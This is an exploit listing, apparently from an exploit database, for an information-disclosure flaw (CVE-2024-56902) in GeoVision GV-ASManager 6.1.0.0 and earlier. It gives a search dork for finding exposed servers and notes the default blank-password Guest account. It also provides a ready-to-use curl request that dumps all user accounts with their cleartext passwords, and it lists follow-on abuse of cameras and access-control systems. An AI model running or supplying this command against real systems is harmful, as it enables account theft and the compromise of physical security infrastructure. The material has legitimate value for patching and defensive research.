Exploit for GeoVision GV-ASManager 6.1.0.0 Information Disclosure CVE-2024-56902

Name: Exploit for GeoVision GV-ASManager 6.1.0.0 Information Disclosure CVE-2024-56902
Rating: 5 (85 reviews)
2025-04-08 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:190344
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
    # Google Dork: inurl:"ASWeb/Login"
    # Date: 02-FEB-2025
    # Exploit Author: Giorgi Dograshvili [DRAGOWN]
    # Vendor Homepage: https://www.geovision.com.tw/
    # Software Link: https://www.geovision.com.tw/download/product/
    # Version: 6.1.0.0 or less
    # Tested on: Windows 10 | Kali Linux
    # CVE : CVE-2024-56902
    # PoC: https://github.com/DRAGOWN/CVE-2024-56902
    
    
    Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
    
    Requirements
    To perform successful attack an attacker requires:
    - GeoVision ASManager version 6.1.0.0 or less
    - Network access to the GV-ASManager web application (there are cases when there are public access)
    - Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
    
    Impact
    The vulnerability can be leveraged to perform the following unauthorized actions:
    A low privilege account is able to:
    - Enumerate user accounts
    - Retrieve cleartext password of any account in GV-ASManager.
    After reusing the retrieved password, an attacker will be able to:
    - Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
    - Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
    - Disrupt and disconnect services such as monitoring cameras, access controls.
    - Clone and duplicate access control data for further attack scenarios.
    - Reusing retrieved password in other digital assets of the organization.
    
    cURL script:
    
    curl --path-as-is -i -s -k -X $'POST' \
        -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
       -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
        --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
        $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
    
    
    After a successful attack, you will get access to:
    - ASWeb	- Access & Security Management 
    - TAWeb	- Time and Attendance Management 
    - VMWeb	- Visitor Management 
    - ASManager - Access & Security Management software in OS